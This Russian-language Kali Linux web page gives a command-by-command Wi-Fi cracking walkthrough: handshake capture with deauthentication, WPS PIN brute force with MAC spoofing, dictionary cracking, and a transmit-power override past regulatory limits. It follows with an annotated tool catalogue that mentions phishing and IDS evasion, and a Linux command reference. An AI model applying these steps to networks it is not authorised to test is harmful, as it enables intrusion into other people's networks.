Форма входа
Календарь
«  Апрель 2024  »
ПнВтСрЧтПтСбВс
1234567
891011121314
15161718192021
22232425262728
2930
Статистика

Онлайн всего: 1
Гостей: 1
Пользователей: 0

 

-- Kali Linux --

Wi-Fi сети: проникновение и защита

Wi-Fi сети: проникновение и защита.
Утилита - reaver
Antenna overclock
Aircrack in Linux
Утилиты в меню Kali Linux
Справочник по командам Linux
Справочник команд в интернете Запуск Kali linux
Kali Linux official doc...(internet link)
 

 

 

Что нам понадобится:
1) Kali Linux - это система для тестирования на уязвимости сетей. Скачать Kali Linux 32 bit ISO
2) Флешка - 8/16 Гб или пустой CD-DVD диск - 6 Гб.
3) Компьютер, используемый Вами для входа в интернет через wifi.
4) Другой компьютер, планшет или смартфон - в качестве жертвы.

Загружаемся в Linux

Пользоваться Kali вполне можно и в режиме Live CD, но если вы хотите иметь возможность сохранять состояние системы между перезагрузками (данные и настройки) — нужно создать отдельный ext2-раздел на флешке с именем persistence, для чего можно использовать GParted в составе самой Kali и разбить флешку прямо во время работы с неё. Когда раздел создан — смонтируйте его и запишите туда единственный файл с именем persistence.conf и таким содержимым:

  • / union
    

  • Для обновления команда: apt-get update
  • Далее, уточним название нашей wifi карты - команда
    iwconfig (здесь wlan0 - название сетевой карты) и
  • ifconfig
  • airmon-ng start wlan0 (monitor mode enabled on mon0))
  • airodump-ng mon0 (STATION- это условие необходимо для успешной атаки.)

Ctrl+c , открываем 2-e окно (Console) командa

  • airodump-ng -w name -c 11 --bssid C0:4A:XX:XX:XX:CE mon0
    -w - любое название .cap файла.
    -c - канал
    --bssid - BSSID атакуемой точки, нужно чтобы появился STATION,

(Enter, в папке root появятся несколько файлов, нам нужен с расширением .cap)

Если при запуске появилась ошибка о незафиксированном канале и/или airodump-ng показывает в правом верхнем углу [ fixed channel -] ,значит, какая-то программа или сервис заставляет адаптер перескакивать с канала на канал (это может быть тот же airodump-ng) и их нужно закрыть с помощью

  • airmon-ng check kill

Oткрываем 3-e окно (Console) командa

  • aireplay-ng -0 1 -a C0:4A:XX:XX:XX:CE -c A0:E4:XX:XX:XX:E6 mon0
    -a - BSSID.
    -c - STATION. (в верхней строке airodump справа сообщение «WPA handshake:C0:4A:XX:XX:XX:CE»

Если handshake нет, снова используем aireplay-ng или

  • mdk3 mon0 d -c 1 -s 1 (-c это номер канала!). Остановить - Ctrl+c
  1. Screen Example: << Disconnecting between: 01:00:XX:XX:FF:FA and: 10:XX:XX:09:01:30 on channel: 11.....>>

копируем файл с расширением .cap на жёсткий диск или в корень USB флешки. (проверим .cap файл, так как он может быть не рабочим.)

  • pyrit -r mechta-01.cap analyze (Чем больше строк со словом good тем лучше. Если «good»ов нет, удаляем файл и повторяем handshake заново.
  1. Screen Example #1: AccessPoint c0:4a:XX:XX:XX:ce ('name'):
    #1: Station 88:32:xx:xx:xx:60, 2 handshake(s):
    #1: HMAC_SHA1_AES, good, spread 1
    #2: HMAC_SHA1_AES, good, spread 3

(очистим и уменьшим .cap файл с помощью wireshark.

открываем 4-e окно (Console) командa:

  • wireshark (Open,открываем файл .cap. В поле Filter вставляем предложение:
  • wlan.fc.type_subtype == 0x08 || wlan.fc.type_subtype == 0x04 || eapol (и нажимаем Apply.)

Export Specified Packets или (Save As..-> в поле Name: пишем любое название файла .cap)

Cпособ взлома WiFi, более простой, с помощью утилиты - reaver

Mеняем свой MAC адрес и смотрим название сетевой карты!

1) iwconfig - wlan0 ( может другое!)
2) ifconfig wlan0 down
3) macchanger -m 00:11:22:33:44:55 wlan0 - меняем MAC адрес
4) airmon-ng start wlan0 - название виртуального адаптера
5) ifconfig mon0 down
6) macchanger -m 00:11:22:33:44:55 mon0
7) ifconfig wlan0 up
8) ifconfig mon0 up

  • wash -i mon0 --ignore-fcs (выводит удобно отформатированную таблицу всех WPS-enabled сетей)

Ctrl+c. В другом окне (Console) запускаем reaver через виртуальный адаптер (у меня mon0),

  • reaver -i mon0 -A -b C0:4A:XX:XX:XX:CE -m 00:11:22:33:44:55 --dh-small --no-nacks --win7 -vv

Классическая атака:

  • reaver -i mon0 -b C0:4A:XX:XX:XX:CE --dh-smal -vv )
    -b - bssid Вашей тестируемой точки
    -m - новый мак адрес
    Enter. Ещё открываем окно для aireplay: Зачем нужен aireplay ?
    Бывает во время перебора, процент долго не увеличивается или зациклился «EAPOL START».
  • aireplay-ng mon0 -1 120 -a C0:4A:XX:XX:XX:CE -e ..essid.. (Ваш ESSID)

(WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking) - Остановите reaver и допишите ключ -r 3:60 или -d 60

Бывает, что reaver задумается и ждёт у моря погоды, попробуйте его подтолкнуть командой wash -i mon0.

грубую силу (необходимо присутствие клиента - STATION).
mdk3 mon0 d -t C0:4A:XX:XX:XX:CE -e ..essid.. (через 3 минуты останавливаем)

Oчень долго гоняет по кругу один и тот же пин или "EAPOL START" - остановите сессию, посмотрите последний pin. Предположим - 65434577. Попробуем перескочить через злополучное место, увеличив значение с большим запасом. Путь, где лежат файлы с сохранёнными данными - (root/usr/local/etc/reaver ). В ней два файла, открываем и редактируем файл с названием MAC (bssid) адреса точки, расширение .wpc. То есть стираем в первой строчке 4 цифры и увеличиваем значение 6543 на 7000 или 6600. Во второй и третьей строчке пишем по нулю. Сохраняем файл.
Далее открываем файл reaver.db, но сначала подключим интернет и скачаем программу sqlitebrowser, команда в терминале apt-get install sqlitebrowser. Скачали? Тогда запускаем. Пишем - sqlitebrowser. С помощью этой программы мы и будем открывать файл reaver.db. File -> Open Database -> путь к файлу -> reaver.db Сохраняем файл, выключаем интернет и запускаем reaver, на вопрос отвечаем yes.

для отключения всех программ, которые используют беспроводной адаптер и не дают зафиксировать канал, используется эта команда:

  • airmon-ng check kill

Antenna overclock

  • ifconfig wlan0 down (Обход региональных ограничений на максимальную мощность передатчика.)
  • iw reg set BO
  • iwconfig wlan0 txpower 500mW (Либо:)
  • iwconfig wlan0 txpower 30
  • ifconfig wlan0 up

При ошибке будет сообщение типа Invalid argument, однако его может и не быть —

после выполнения проверьте значение txpower в - iwconfig.

 

Aircrack in Linux

И так, рабочий name-01.cap, проверим его в деле с помощью Aircrack, команда

  • aircrack-ng -w /pentest/passwords/wordlists/password.lst name-01.cap

    Остановите программу - Ctrl+c.

Обзор разделов с утилитами в меню Kali Linux

Наверх
=============== Top 10 security tools (топ 10 инструментариев для безопасности) ===============
Данный пункт содержит список из 10 самых нужных , по мнению разработчиков, утилит для взлома и проникновения.

aircrack-ng — штука для ломания паролей WPA-PSK, WEP, она восстанавливает ключи путем собирания пакетов. Так же является популярным и неплохим сниффером для wi-fi.
burpsuite — платформа, для проведения форс-атак на веб-приложения. Вurpsuite включает много разнообразных утилит со специализированно спроектированными и-фейсами, дающими возможность улучшить и форсировать процесс атаки. Весь инструментарий основывается на фреймворке, который позволяет нам перехватывать и демонстрировать пользователю HTTP-сообщения, работать с авторизацией, прокси-серверами и производить логирование разнообразных данных.
thc hydra — подборщик паролей к разным сервисам от ребят из группировки «the hacker choice». Она умеет делать подборку паролей к SSH, FTP, MySQL, MS-SQL, POP3, IMAP, HTTP/HTTPS basic-auth, без проблем ломает пароли к роутерам cisco и т.д.
john the ripper — прога, для восстановления паролей по хэшам, в unix-подобных системах и не только. Мего-популярны продукт, должен отметить, почти легенда) .
maltego — отличный инструментарий для инженера. Нужен для сбора инфы с различных БД, плюс ко всему представлен в удобном для понимания формате. К примеру, инфы о каком-либо предприятии, от общедоступных данных , до личных номеров сотрудников.
metasploit framework — нужна для работы с эксплойтами, которых имеется большая внутренняя база.
nmap — простой и простой порт-сканнердля никсов.
sqlmap – прога написанная на питоне, для поиска уязвимостей в sql, sql- подобных БД, а так же деланья sql инъекций . Отличная штука.
wireshark — это анализатор трафика сети. Его задача в том, что бы отлавливать сетевой трафик и детально отображать его.
• zaproxy — Инструментарий, дающий возможность упростить и ускорить поиск уязвимостей в веб-приложениях. Может перехватывать прокси, внутри — авто и пассивный сканер, фазер, брут, и динамик генератор ssh-сертификатов.

2. Information gathering (сбор данных)
Этот пункт составлен из множества подпунктов, будем рассматривать по порядку:
DNS analisys (анализ dns) —включены:
1) dnsdict6 — прога подменяет dns записи domain, используя словари или\и встроенный список.
2) dnsenum — прога для сбора полной инфы о домене, насколько это возможно.
3) dnsmap — нужна для использования пентестерами при сборе инфы, к примеру, блоки IP адресов компании, ДНСники, номера телефонов компании и т.д.
4) dnsrecon — сбор наиболее полной инфы о DNS записях, IPS, на этапе сбора инфы.
5) dnsrevenum6 — прога для реверсинга dns инфы по протоколу IP v6.
6) dnstracer — прога предназначенная для трассировки dns запросов к серверу DNS, к примеру момент когда сервер получает информацию о записи, и цепь до серверов DNS, которые имеют известную запись о хосте.
7) dnswalk — отладчик DNS. Она позволяет выполнить перенос зон указанных доменов и проверяет БД различными способами на достоверность и ошибки.
8) fierce —Легковесный сканер DNS , на ПЁРЛЕе. Помогает обнаружить реальный IP за DNS-записью. Поддерживает множество методов сбора данных, от техники передачи DNS zone, кончая банальным брутом.
9) maltego — отличный инструментарий для социального инженера. Нужна для сбора инфы с различных баз данных, а также представления в удобном для понимания формате. К примеру инфы о каком либо предприятии, начиная от общедоступных данных , кончая личными номерами сотрудников. Must have!
10) nmap — простой порт-сканнердля unix систем.
11) urlcrazy — отличная прога. позволяет проверить «опечатки» в написании url «нужного» домена, оценить популярность «очепятки» на основании основ правописания и многих других параметров. Генерирует 15 видов опечаток, генеририует омонимы и т.п. Очень удобно для фишинговых проектов.

IDS/IPS identefication (поиск систем обнаружения и предотвращения вторжений)
В данном пункте собраны тулзы для обнаружения систем IDS/IPS. А то ненароком можно и спалиться…..
1) fragroute — использует несколько методов обмана систем распознавания атак на основе сигнатур, применяемых многими системами обнаружения проникновений и межсетевыми экранами.
2) fragrouter — программа, предназначенная для обхода систем обнаружения вторжений (IDS), которая позволяет скрыть атаку, разбивая ее на фрагменты IP.
3) wafw00f — прога на питоне. нужна для поиска файрволлов веб приложений, методом «стимул\ответ».

Live host identification (определение «живых» хостов)
1) alive6 — обнаружение всех работающих систем на данном адресе
2) arping — прога для обнаружения хостов в компьютерной сети, работающая на втором уровне модели OSI, использует протокол ARP.
3) cdpsnarf — сниффер, предназначенный специально для извлечения инфы из CDP (Cisco Discovery Protocol) пакетов.
4) detect-new-ip 6 — инструментарий для обнаружения ip v6 адресов, присоединившихся к локальной сети.
5) detect-sniffer6 — обнаружение снифферов в сети ip v6.
6) DMitry — быстрый сбор инфы о хосте, от простого whois, до скана портов TCP.
7) dnmap client — клиент фрейм dnmap для распределенного скана хостов несколькими клиентскими машинами при помощи nmap.
8) dnmap server — сервер фрейм dnmap для распределенного скана хостов несколькими клиентскими машинами при помощи nmap.
9) fping — Проверяет доступность узлов в сети путем посылания ICMP ECHO_REQUEST пакетов. Можно указать сколько угодно узлов в командной строке или указать текстовый файл со списком узлов.
10) hping — ассембелер и анализатор TCP/IP пакетов, работающий из консолис большим списком возможностей. поддерживает TCP, UDP, ICMP и RAW-IP протоколы, имеет режим трассировки, возможность отправки файлов между скрытыми каналами, и многие другие функции.
11) inverse_lookup6 — получение ip v6 адреса по MAC адресу.
12) miranda — внятной инфы не нашел.
13) ncat — многофункциональная сетевая прога для чтения-записи данных между сетями из командной строки. Переработанный netcat для проекта nmap.
14) netdiscover – активный-пассивный сканер-разведчик адресов беспроводных сетей без DHCP сервера .
15) nmap — простой порт-сканнердля unix систем.
16) passive_discovery6 — пассивный слушатель сетей ip v6, предоставляет список активных устройств в подсети.
17) thcping6 — при помощи этой утилиты мы можем собирать пакеты ICMP v6, настраивать практически любые поля в заголовке, по крайней мере, наиболее важные из них.
18) wol-e — набор инструментарийов для использования функций wake-on-lan у компьютеров в локальной сети, включена по умолчанию у компьютеров Apple.
19) xprobe2 — система активного сбора отпечатков ОС , использующая различные методы сбора инфы. Полагается на нечеткое соответствие подписи, вероятностные совпадения , несколько соответствий одновременно, и собственную базу данных сигнатур.

Network scanners (сканеры сети)
В этом разделе повторяются все пункты из предыдущего раздела.
1) DMitry — быстрый сбор инфы о хосте, от простого whois, до скана портов TCP.
2) dnmap client — клиент фрейм dnmap для распределенного скана хостов несколькими клиентскими машинами при помощи nmap.
3) dnmap server — сервер фрейм dnmap для распределенного скана хостов несколькими клиентскими машинами при помощи nmap.
4) netdiscover – активный-пассивный сканер-разведчик адресов беспроводных сетей без DHCP сервера .
5) nmap — простой порт-сканнердля unix систем.

OS Fingerprinting (Сбор отпечатков(фингерпринтов) операционных систем)
1) dnmap client — клиент фрейм dnmap для распределенного скана хостов несколькими клиентскими машинами при помощи nmap.
2) dnmap server — сервер фрейм dnmap для распределенного скана хостов несколькими клиентскими машинами при помощи nmap.
3) miranda — внятной инфы не нашел.
4) nmap — простой порт-сканнердля unix систем.

OSINT analisys (Разведка на основе открытых источников)
1) casefile — система для сбора и анализа данных на основе открытых источников. Дает возможность быстро добавлять, связывать и анализировать данные.
2) creepy — утила для сбора геолокационных данных о жертве на основе инфы из социальных сетей и хостингов изображений. Инфа предоставлена в удобнов виде прямо на карте, с комментами.
3) DMitry — быстрый сбор инфы о хосте, от простого whois, до скана портов TCP.
4) jigsaw — сбор инфы из онлайн справочников и директорий, к примеру, e-mail адреса.
5) maltego — отличный инструментарий для социального инженера. Нужна для сбора инфы с различных баз данных, а также представления в удобном для понимания формате. К примеру инфы о каком либо предприятии, начиная от общедоступных данных , кончая личными номерами сотрудников.
6) Metagoofil — является инструментарий для сбора инфы, для извлечения метаданных официальных документов (PDF, DOC, XLS, PPT, DOCX, PPTX, XLSX), принадлежащих жертве. Использует Google для идентификации и сбора документов на жесткий диск, а затем извлекать метаданные с помощью билиотек , таких, как, к примеру, Hachoir, PdfMiner?. Вместе с отчетами генерирует имена пользователей, версии ПО и многое другое.
7) theharvester — Цель этой программы является сбор сообщений электронной почты, поддоменов, хостов , имен сотрудников, open портов и баннеров из различных открытых источников, таких как поисковые движки, key-servers PGP и БД SHODAN.
8) twofi — составления баз данных пользователей на основе сбора инфы из twitter.
9) urlcrazy — отличная прога. позволяет проверить «опечатки» в написании url «нужного» домена, оценить популярность «очепятки» на основании основ правописания и многих других параметров. Генерирует 15 видов опечаток, генеририует омонимы и т.п. Очень удобно для фишинговых проектов.

Route Analysis (Анализ маршрутизации)
1) dnmap client — клиент фрейм dnmap для распределенного скана хостов несколькими клиентскими машинами при помощи nmap.
2) dnmap server — сервер фрейм dnmap для распределенного скана хостов несколькими клиентскими машинами при помощи nmap.
3) intrace — похожая на traceroute прога, позволяющая вычислить число «хопов» к хосту, через существующее TCP коннект из локальной сети, или через удаленный хост, минуя файрволл.
4) netmask — прога для вычисления маски сети по адресу.
5) trace6 -очень быстрый taceroute для ip v6.

Service fingerprinting (сбор отпечатков сервисов)
1) dnmap client — клиент фрейм dnmap для распределенного скана хостов несколькими клиентскими машинами при помощи nmap.
2) dnmap server — сервер фрейм dnmap для распределенного скана хостов несколькими клиентскими машинами при помощи nmap.
3) implementation6 — позволяет выполнить различные проверки реализации IPv6.
4) impelemtation6d — позволяет выполнить различные проверки реализации IPv6.
5) ncat — многофункциональная сетевая прога для чтения-записи данных в сети и между сетями из командной строки. Передаланный netcat для проекта nmap.
6) nmap — простой порт-сканнердля unix систем.
7) sslscan — прога сверяется с сервисовами Ssl, такими, как , к примеру HTTPS, для определения используемых методов шифрования.
8) sslyze — быстрый и многофункциональный SSL сканер.
9) tlssled — прога, целью которой является оценка безопасности соединения SSL/TLS(https)

SMB analysis (анализ протокола SMB)
1) acccheck — прога создана для анализа Microsoft Active Accessibility (MSAA) в реализации для WINDOWS.
2) nbtscan — позволяет получить информацию о NetBIOS имени удалённого компьютера, а также о его расшаренных ресурсах. Имеет много доп. функций, позволяющих гибко управлять детализацией выходных данных. Позволяет сканировать диапазон IP-адресов.
3) nmap — простой порт-сканнердля unix систем.

SMTP analysis (анализ почтового протокола SMTP)
1) nmap — простой порт-сканнердля unix систем.
2) smtp-user-enum — вычисляет пользователей SMTP на удаленной системе, путем посыла VRFY, EXPN или RCPT TO команд.
3) swaks – многофункциональная, гибкая прога для анализа SMTP.

SNMP analysis ( анализ протокола SNMP )
1) braa — инструментарий для создания запросов SNMP, способный сканировать сотни хостов одновременно, при этом являясь полностью однопоточным. Использует собственный движок SNMP.
2) cisco-auditing-tool — пёрле скрипт скана cisco инструментарий на популярные уязвимости, к примеру пароли по умолчанию, легко угадываемые имена рабочих групп. Включает в себя поддержку плагинов и нескольких хостов одновременно.
3) cisco-torch – прога для массового скана, обнаружения и эксплуатации Cisco инструментарий от авторов «Hacking Exposed Cisco Networks». Программа использует несколько методов снятия отпечатков у прикладных сервисов. Быстро обнаруживает Cisco хосты с запущенными сервисовами telnet, ssh, Web, NTP и SNMP и позволяет выполнить нападение по словарю против обнаруженных сервисов.
4) copy-router-config — удаление неиспользуемых пакетов и добавление конфигурационных скриптов cisco
5) merge-router-config — удаление неиспользуемых пакетов и добавление конфигурационных скриптов cisco.
6) nmap — простой порт-сканнердля unix систем.
7) onesixtyone — модифицированная версия брутфорсера SNMP Solar Eclipse . Это сканер SNMP , который посылает множественные SNMP запросы, к множеству IP адресов, используя различные аргументы, и ждет ответа.
8) snmpcheck — позволяет выделить SNMP устройства в сети , и предоставить выходные данные в удобоваримом для понимания формате.

SSL analysis (анализ SSL соединений)
1) sslcaudit — эта прога нужна для автоматизации тестирования клиентской части SSL/ TLS соединений, для предотвращения атак типа MITM.
2) ssldump — это анализатор SSL v3 / TLS. Проверяет TCP трафик на выбранном сетевом интерфейсе, и пытается интерпретировать его как защищенный трафик, когда прога определяет SSL/TLS трафик, она перегоняет записи в текстовый формат в форме STDOUT. При наличии дешифрующего материала она дешифрует трафик и позволяет просмотреть подробности трафика защищенного приложения.
3) sslh — принимает соединения с указанных портов, и перенаправляет запрос на основе данных первого тестового пакета от удаленного клиента.
4) sslscan — прога сверяется с сервисовами Ssl, такими, как , к примеру HTTPS, для определения используемых методов шифрования.
5) sslsniff — прога нужна для атак MITM на все SSL соединения в локальной сети, динамически генерирует сертификаты для доменов, которые доступны в данный момент. Новые сгенерированные сертификаты встраиваются в цепь существующих сертификатов.
6) sslstrip — незаметно угоняет http трафик, следит за ссылками и редиректами на https, после чего перегоняет эти URL в ссылки-двойники или омографические https ссылки .
7) sslyze — быстрый и многофункциональный SSL сканер.
8) stunnel4 — работает в качестве оболочки для SSL шифрования между сервером и клиентом. Дает возможность шифрования SSL популярных протоколов — POP2,POP3,IMAP без каких либо изменений в коде программ. Пользует библиотеку OpenSSL.
9) tlssled — прога, целью которой является оценка безопасности соединения SSL/TLS(https)

Telephony analysis (анализ телефонии)
1) ace — анализ TFTP

Traffic analysis (анализ траффика)
1) cdpsnarf — сниффер, предназначенный специально для извлечения инфы из CDP (Cisco Discovery Protocol) пакетов.
2) intrace — похожая на traceroute прога, позволяющая вычислить число «хопов» к хосту, через существующее TCP коннект из локальной сети, или через удаленный хост, минуя файрволл.
3) irpas-ass — автономный системный сканер. Поскольку протоколы роутинга используют автономные системы для распределения запросов между доменами роутинга и различные пути для коммуникации, вам нужно нечто работающее, как сканер TCP портов, но умеет больше чем один протокол.
4) irpass-cdp – прога для стресстестинга cisco маршрутизаторов и протоклов.
5) p0f — прога для фингерпринта ОС, использующая пассивные способы определения систем на «той стороне провода». Используйте там, где nmap не подходит.
6) tcpflow — программа для захвата и анализа части данных TCP протокола, именуемых flow (потоки) , и сохраняет данные в удобном виде для отладки и анализа.
7) wireshark — это анализатор сетевого трафика. Его задача в том, чтоб ловить сетевой трафик и отображать его в детальном виде.

VOIP analysis (анализ voip телефонии)
1) ace — анализ TFTP
2) enumiax — брутфорсер для Asterisk. Использует два метода — обыкновенный перебор и атаку по словарю.

VPN analysis (анализ VPN соединений)
1) ike-scan — консольная прога, использующая протокол IKE для обнаружения, fingerprint, и тестирования VPN серверов.
3. Vulnerability analysis (анализ на уязвимости).

В данном меню содержится набор инструментарийов для поиска и анализа уязвимостей в приложениях, сервисах и т.п.
CISCO tools (инструментарийы для работы с CISCO маршрутизаторами) .
1) cisco-auditing-tool — пёрле скрипт скана cisco маршрутизаторов на распространенные уязвимости, к примеру пароли по умолчанию, легко угадываемые имена рабочих групп. Включает в себя поддержку плагинов и нескольких хостов одновременно.
2) cisco-global-exploiter — эксплойт пак в виде пёрл скрипта , содержащий в себе самые «могучие» эксплойты для продуктов CISCO.
3) cisco-ocs — сканер диапазонов IP адресов для поиска устройств CISCO или любого другого устройства с открытым портом 23. После обнаружения устройств пытается войти через telnet коннект, используя дефолтный пароль cisco.
4) cisco-torch – прога для массового скана, обнаружения и эксплуатации Cisco роутеров от авторов «Hacking Exposed Cisco Networks». Программа использует несколько методов снятия отпечатков у прикладных сервисов. Быстро обнаруживает Cisco хосты с запущенными сервисовами telnet, ssh, Web, NTP и SNMP и позволяет выполнить нападение по словарю против обнаруженных сервисов.
5) yersinia — сетевой инструментарий, для использования слабых мест в различных сетевых портоколах. Претендует на звание лучшего фрейм для анализа и тестирования сетей и систем.

Database Assessment (Исследование БД)
1) bbqsql — это фреймворк, созданный специально для быстрого проведения SQL-инъекций.
2) dbpwaudit — утиль написанная на java, для онлайн проверки качества паролей к некоторым базам данным. Утила позволяет легко подключать БД путем обычного добавления JDBC файлов драйверов в папку приложения.
3) hexorbase — утила для анализа и аудита нескольких, объединенных в одном месте, серверов баз данных. Работает с такими распространенными БД как MySQL, Sqlite, MS sql server, Oracle, Postgre SQL. Поддерживает роутинг через прокси, и даже может обнаруживать сервера, скрытые за NAT.
4) mdb-export — прога экспортирует данные из формата MDB в формат CSV.
5) mdb-hexdump — делает дампы бинарных файлов MDB.
6) mdb-parsecsv — преобразует файл CSV в массив на языке С.
7) mdb-sql — позволяет обращаться к MDB файлам используя запросы подмножества языка SQL .
8) mdb-tables — приводит таблицы в БД MDB к виду пригодному к использованию в shell-скриптах.
9) oscanner — инструментарий для исследования БД Oracle, написанный на JAVA, имееет архитектуру основанную на плагинах.
10) sidguesser — опрашивает sids, экземпляры БД Oracle по файлу-словарю, опрашивает медленно, но эффективно.
11) sqldict — осуществляет атаку по словарю на SQL сервер.
11.) sqlmap – прога на python, для поиска уязвимостей в sql- подобных БД, а так же проведения sql инъекций . Отличная софтина.
12) sqlninja — нужна для sql-инъекций на веб приложения.
13) sqlsus — программа предназначенная для проведения атак и инъекций на БД MySQL, написанная на пёрле .
14) tnscmd10g — юзаем для прямого обращения к TNS слушателю Oracle напрямую, без использования клиентской части.

Fuzzing Tools (Инструментарий для fuzzing (поиска программных ошибок)
Фаззинг – (от англ. fuzzing) это процесс отсылки намеренно некорректных данных в исследуемый объект с целью вызвать ситуацию сбоя или ошибку.
1) bed — ( Bruteforce Exploit Detector) — fazzer протоколов с открытой передачей текста, на распространенные уязвимости как переполнение буфера, переполнение целочисленных переменных, и т.д. Написан на пёрле и поддерживает следующие протоколы: finger, imap, socks4, socks5, ftp, irc, smtp, http.
2) fuzz_ip6 — fazzer протокола ip v6.
3) ohrwurm — легкий и простой fazzer RTP.
4) powerfuzzer — отлично автоматизированный и полностью настраиваемый веб-fazzer ( fazzer веб -приложений на HTTP протоколе). В его основе — другие Open Source fazzerы, БД пополняется из открытых источников по информационной безопасности. Удобный, дружественный интерфейс.
5) sfuzz — простой fazzer, с низкими требованиями. Настоящий движок для фаззинга.
6) siparmyknife — это небольшая прога, работающая из консолидля разработчиков и админов Session Initiation Protocol (SIP) приложений.

Справочник по командам Linux

_______________________ Файловые команды _______________________
Наверх
ls – список файлов и каталогов
ls -al – форматированный список со скрытыми каталогами и файлами
cd dir – сменить директорию на dir
cd – сменить на домашний каталог
pwd – показать текущий каталог
mkdir dir – создать каталог dir
rm file – удалить file
rm -r dir – удалить каталог dir
rm -f file – удалить форсированно file
rm -rf dir – удалить форсированно каталог dir
cp file1 file2 – скопировать file1 в file2
cp -r dir1 dir2 – скопировать dir1 в dir2; создаст каталог dir2, если он не существует
mv file1 file2 – переименовать или переместить file1 в file2. если file2 существующий каталог - переместить file1 в каталог file2
ln -s file link – создать символическую ссылку link к файлу file
touch file – создать file
cat > file – направить стандартный ввод в file
more file – вывести содержимое file
head file – вывести первые 10 строк file
tail file – вывести последние 10 строк file
tail -f file – вывести содержимое file по мере роста, начинает с последних 10 строк

Наверх
_______________________ Управление процессами _______________________

ps – вывести ваши текущие активные процессы
top – показать все запущенные процессы
kill pid – убить процесс с id pid
killall proc – убить все процессы с именем proc
bg – список остановленных и фоновых задач; продолжить выполнение остановленной задачи в фоне
fg – выносит на передний план последние задачи
fg n – вынести задачу n на передний план
Права доступа на файлы
chmod octal file – сменить права file на octal, раздельно для пользователя, группы и для всех добавлением:
4 – чтение (r)
2 – запись (w)
1 – исполнение (x)

Примеры:
chmod 777 – чтение, запись, исполнение для всех
chmod 755 – rwx для владельца, rx для группы и остальных.
Дополнительные опции: man chmod.

Наверх

_______________________ SSH _______________________

ssh user@host – подключится к host как user
ssh -p port user@host – подключится к host на порт port как user
ssh-copy-id user@host – добавить ваш ключ на host для user чтобы включить логин без пароля и по ключам


_______________________ Поиск _______________________

grep pattern files – искать pattern в files
grep -r pattern dir – искать рекурсивно pattern в dir
command | grep pattern – искать pattern в выводе command
locate file – найти все файлы с именем file

Наверх
_______________________ Системная информация _______________________

date – вывести текущую дату и время
cal – вывести календарь на текущий месяц
uptime – показать текущий аптайм
w – показать пользователей онлайн
whoami – имя, под которым вы залогинены
finger user – показать информацию о user
uname -a – показать информацию о ядре
cat /proc/cpuinfo – информация ЦПУ
cat /proc/meminfo – информация о памяти
man command – показать мануал для command
df – показать инф. о использовании дисков
du – вывести “вес” текущего каталога
free – использование памяти и swap
whereis app – возможное расположение программы app
which app – какая app будет запущена по умолчанию


_______________________ Архивация _______________________

tar cf file.tar files – создать tar-архив с именем file.tar содержащий files
tar xf file.tar – распаковать file.tar
tar czf file.tar.gz files – создать архив tar с сжатием Gzip
tar xzf file.tar.gz – распаковать tar с Gzip
tar cjf file.tar.bz2 – создать архив tar с сжатием Bzip2
tar xjf file.tar.bz2 – распаковать tar с Bzip2
gzip file – сжать file и переименовать в file.gz
gzip -d file.gz – разжать file.gz в file

Наверх

Далее ->>